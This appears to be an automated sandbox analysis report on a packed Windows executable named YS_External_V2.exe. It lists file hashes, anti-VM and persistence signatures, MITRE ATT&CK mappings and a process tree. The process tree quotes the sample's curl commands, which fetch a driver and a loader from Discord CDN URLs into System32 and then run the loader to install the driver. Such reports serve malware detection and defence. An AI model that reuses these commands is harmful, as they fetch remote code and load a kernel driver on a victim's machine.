Overview

overview

9

Static

static

7

YS_External_V2.exe

windows7-x64

9

YS_External_V2.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    26s
  • max time network
    30s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2023 08:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    YS_External_V2.exe

  • Size

    23.7MB

  • MD5

    a55deccd022c6cf5a67bd3138a0a6d69

  • SHA1

    cef90145fa44b969af6ec76b7ac650e778e5c953

  • SHA256

    914d9b43d9d945fe5c372487ffa692b6d1d68e64945a726b2c35699c31af661e

  • SHA512

    b797d8ab14c3acc232d243c5a7bd0958929d93c4ba96b4dd68f3167c5b8753c63a874b1a6f0cdcd7f43dcb250958e0572b23ceee6b6e36a1fb1a011fb2e5ada6

  • SSDEEP

    393216:Mm9FpgMIfmAL0Fnch/d9WOBkUS9RBnuBRhfvSoWchi3x1Bn:D97gb0dcd9jkLT8BjYc2N

Score
9/10
evasionpersistencethemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe
    "C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:4248
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:4852
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\system32\curl.exe
          curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
          3⤵
          • Drops file in System32 directory
          PID:964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\system32\curl.exe
          curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
          3⤵
          • Drops file in System32 directory
          PID:100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:4308
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4892
          • C:\Windows\System32\yamsmapper.exe
            C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
            3⤵
            • Sets service image path in registry
            • Executes dropped EXE
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:4908
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:4012

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        Defense Evasion

        Virtualization/Sandbox Evasion

        1
        T1497

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        Query Registry

        2
        T1012

        Virtualization/Sandbox Evasion

        1
        T1497

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Windows\System32\yamsmapper.exe
          Filesize

          153KB

          MD5

          666d7f4bb7cf64772755b9a184486525

          SHA1

          a645d988ff67e72aac11cc9560dbf89a8320aef0

          SHA256

          a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

          SHA512

          3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

          Download Submit
        • C:\Windows\System32\yamsmapper.exe
          Filesize

          153KB

          MD5

          666d7f4bb7cf64772755b9a184486525

          SHA1

          a645d988ff67e72aac11cc9560dbf89a8320aef0

          SHA256

          a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

          SHA512

          3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

          Download Submit
        • C:\Windows\System32\yamsud.sys
          Filesize

          12KB

          MD5

          141ecbccc4bfbf03b8768232d5c6a273

          SHA1

          0e0c0340b8bccfd6aa352e80739c882e4bbe5404

          SHA256

          2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122

          SHA512

          aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7

          Download Submit
        • memory/4248-136-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-137-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-138-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-140-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-142-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-133-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-134-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-135-0x00007FF6E5520000-0x00007FF6E7A39000-memory.dmp
          Filesize

          37.1MB

          Download
        • memory/4248-148-0x0000024FDB630000-0x0000024FDB631000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4248-149-0x0000024FDB630000-0x0000024FDB631000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4248-150-0x0000024FDB630000-0x0000024FDB631000-memory.dmp
          Filesize

          4KB

          Download